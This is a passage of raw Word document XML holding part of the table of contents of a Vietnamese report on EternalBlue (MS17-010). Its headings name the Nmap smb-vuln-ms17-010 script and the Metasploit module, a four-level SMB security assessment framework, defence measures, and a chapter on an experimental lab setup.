        <w:t>Trang 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC0BCE6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.3.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·························· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BB958" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.3.3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> module ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ············· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A22D20" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.4. Khung </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đánh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cấp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giải</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>pháp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thể</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ············· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9FB64" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.4.1. Khung </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đánh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ninh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>theo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cấp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ············· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E1235" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.4.2. Các </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giải</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>pháp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chiều</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sâu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>giao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thức</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ············· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD3DC9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  TỔNG KẾT CHƯƠNG 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ························································ </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928539D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  TÀI LIỆU THAM KHẢO CHƯƠNG 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·············································· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C70CD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>CHƯƠNG 2. THIẾT KẾ VÀ TRIỂN KHAI MÔ HÌNH THỰC NGHIỆM</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ······················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2015E1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Yêu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cầu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nguyên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tắc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thiết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
